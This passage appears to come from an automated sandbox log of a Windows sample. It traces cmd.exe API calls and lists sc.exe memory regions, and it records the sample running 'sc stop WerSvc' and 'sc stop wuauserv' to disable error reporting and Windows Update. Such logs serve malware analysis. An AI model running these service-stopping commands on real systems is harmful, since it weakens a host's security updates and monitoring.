_String2="ERRORLEVEL") returned 11 [0021.546] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0021.546] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0021.547] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0021.547] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0021.547] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0021.547] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0021.547] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0021.547] GetEnvironmentStringsW () returned 0x792230* [0021.547] FreeEnvironmentStringsW (penv=0x792230) returned 1 [0021.547] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0021.547] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0021.547] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0021.547] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0021.547] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0021.547] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0021.547] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0021.547] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0021.547] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0021.547] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0021.547] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x33f500 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.547] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x33f500, lpFilePart=0x33f4fc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f4fc*="Desktop") returned 0x25 [0021.547] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0021.547] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x33f27c | out: lpFindFileData=0x33f27c) returned 0x791e98 [0021.547] FindClose (in: hFindFile=0x791e98 | out: hFindFile=0x791e98) returned 1 [0021.547] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x33f27c | out: lpFindFileData=0x33f27c) returned 0x791e98 [0021.547] FindClose (in: hFindFile=0x791e98 | out: hFindFile=0x791e98) returned 1 [0021.548] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0021.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x33f27c | out: lpFindFileData=0x33f27c) returned 0x791e98 [0021.548] FindClose (in: hFindFile=0x791e98 | out: hFindFile=0x791e98) returned 1 [0021.548] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0021.548] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0021.548] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0021.548] GetEnvironmentStringsW () returned 0x7940a0* [0021.548] FreeEnvironmentStringsW (penv=0x7940a0) returned 1 [0021.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0021.548] GetConsoleOutputCP () returned 0x1b5 [0021.548] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.548] GetUserDefaultLCID () returned 0x409 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x33f640, cchData=128 | out: lpLCData="0") returned 2 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x33f640, cchData=128 | out: lpLCData="0") returned 2 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x33f640, cchData=128 | out: lpLCData="1") returned 2 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0021.549] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0021.550] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0021.550] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0021.550] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0021.550] GetConsoleTitleW (in: lpConsoleTitle=0x792da8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0021.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0021.551] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0021.551] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0021.551] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0021.551] _wcsicmp (_String1="sc", _String2=")") returned 74 [0021.551] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0021.551] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0021.551] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0021.551] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0021.551] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0021.551] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0021.552] GetConsoleTitleW (in: lpConsoleTitle=0x33f338, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0021.552] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0021.552] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0021.552] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0021.552] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0021.552] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0021.552] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0021.552] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0021.552] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0021.552] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0021.552] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0021.552] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0021.552] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0021.552] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0021.552] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0021.552] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0021.552] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0021.552] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0021.552] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0021.552] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0021.552] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0021.552] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0021.552] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0021.552] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0021.553] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0021.553] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0021.553] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0021.553] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0021.553] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0021.553] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0021.553] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0021.553] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0021.553] _wcsicmp (_String1="sc", _String2="START") returned -17 [0021.553] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0021.553] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0021.553] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0021.553] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0021.553] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0021.553] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0021.553] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0021.553] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0021.553] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0021.553] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0021.553] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0021.553] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0021.553] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0021.553] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0021.553] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0021.553] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0021.553] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0021.553] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0021.553] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0021.553] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0021.553] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0021.553] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0021.553] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0021.553] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0021.553] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0021.553] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0021.553] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0021.553] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0021.553] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0021.553] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0021.553] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0021.553] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0021.553] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0021.553] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0021.553] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0021.553] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0021.553] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0021.553] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0021.553] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0021.553] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0021.553] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0021.554] _wcsicmp (_String1="sc", _String2="START") returned -17 [0021.554] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0021.554] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0021.554] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0021.554] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0021.554] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0021.554] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0021.554] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0021.554] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0021.554] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0021.554] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0021.554] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0021.554] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0021.554] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0021.554] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 [0021.554] SetErrorMode (uMode=0x0) returned 0x0 [0021.554] SetErrorMode (uMode=0x1) returned 0x0 [0021.554] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x7807f8, lpFilePart=0x33ee58 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33ee58*="Desktop") returned 0x25 [0021.554] SetErrorMode (uMode=0x0) returned 0x1 [0021.554] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0021.554] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0021.558] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0021.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0021.559] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x33ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ebd4) returned 0xffffffff [0021.559] GetLastError () returned 0x2 [0021.559] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\sc", fInfoLevelId=0x1, lpFindFileData=0x33ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ebd4) returned 0xffffffff [0021.560] GetLastError () returned 0x2 [0021.560] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0021.560] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x33ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ebd4) returned 0x793440 [0021.560] FindClose (in: hFindFile=0x793440 | out: hFindFile=0x793440) returned 1 [0021.560] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x33ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ebd4) returned 0xffffffff [0021.560] GetLastError () returned 0x2 [0021.560] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x33ebd4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x33ebd4) returned 0x793440 [0021.560] FindClose (in: hFindFile=0x793440 | out: hFindFile=0x793440) returned 1 [0021.560] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0021.560] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0021.560] GetConsoleTitleW (in: lpConsoleTitle=0x33f0cc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0021.560] InitializeProcThreadAttributeList (in: lpAttributeList=0x33ef54, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x33f01c | out: lpAttributeList=0x33ef54, lpSize=0x33f01c) returned 1 [0021.560] UpdateProcThreadAttribute (in: lpAttributeList=0x33ef54, dwFlags=0x0, Attribute=0x60001, lpValue=0x33f014, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x33ef54, lpPreviousValue=0x0) returned 1 [0021.560] GetStartupInfoW (in: lpStartupInfo=0x33ef10 | out: lpStartupInfo=0x33ef10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0021.560] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0021.560] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0021.560] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0021.560] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.560] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.560] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0021.561] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0021.561] lstrcmpW (lpString1="\\sc.exe", lpString2="\\XCOPY.EXE") returned -1 [0021.563] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\sc.exe", lpCommandLine="sc stop WerSvc", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x33efb0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="sc stop WerSvc", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x33effc | out: lpCommandLine="sc stop WerSvc", lpProcessInformation=0x33effc*(hProcess=0x78, hThread=0x74, dwProcessId=0xb50, dwThreadId=0xb54)) returned 1 [0021.630] CloseHandle (hObject=0x74) returned 1 [0021.630] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0021.630] GetEnvironmentStringsW () returned 0x795ee0* [0021.631] FreeEnvironmentStringsW (penv=0x795ee0) returned 1 [0021.631] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0021.927] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x33eef0 | out: lpExitCode=0x33eef0*=0x426) returned 1 [0021.927] CloseHandle (hObject=0x78) returned 1 [0021.927] _vsnwprintf (in: _Buffer=0x33f038, _BufferCount=0x13, _Format="%08X", _ArgList=0x33eefc | out: _Buffer="00000426") returned 8 [0021.927] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000426") returned 1 [0021.927] GetEnvironmentStringsW () returned 0x7940a0* [0021.927] FreeEnvironmentStringsW (penv=0x7940a0) returned 1 [0021.927] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0021.927] GetEnvironmentStringsW () returned 0x7940a0* [0021.927] FreeEnvironmentStringsW (penv=0x7940a0) returned 1 [0021.927] DeleteProcThreadAttributeList (in: lpAttributeList=0x33ef54 | out: lpAttributeList=0x33ef54) [0021.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0021.928] _get_osfhandle (_FileHandle=1) returned 0x7 [0021.928] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0021.928] _get_osfhandle (_FileHandle=0) returned 0x3 [0021.928] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0021.928] SetConsoleInputExeNameW () returned 0x1 [0021.928] GetConsoleOutputCP () returned 0x1b5 [0021.928] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0021.928] SetThreadUILanguage (LangId=0x0) returned 0x409 [0021.928] exit (_Code=1062) Process: id = "9" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x640d2000" os_pid = "0xad4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0xa64" cmd_line = "sc stop wuauserv" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000101a7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 654 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 655 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 656 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 657 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 658 start_va = 0x90000 end_va = 0x93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 659 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 660 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 661 start_va = 0x180000 end_va = 0x18bfff entry_point = 0x180000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 662 start_va = 0x774c0000 end_va = 0x77668fff entry_point = 0x774c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 663 start_va = 0x776a0000 end_va = 0x7781ffff entry_point = 0x776a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 664 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 665 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 666 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 667 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 668 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 669 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 670 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 860 start_va = 0x290000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 861 start_va = 0x74bd0000 end_va = 0x74bd7fff entry_point = 0x74bd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 862 start_va = 0x74be0000 end_va = 0x74c3bfff entry_point = 0x74c1f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 863 start_va = 0x74c40000 end_va = 0x74c7efff entry_point = 0x74c6de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 864 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 865 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 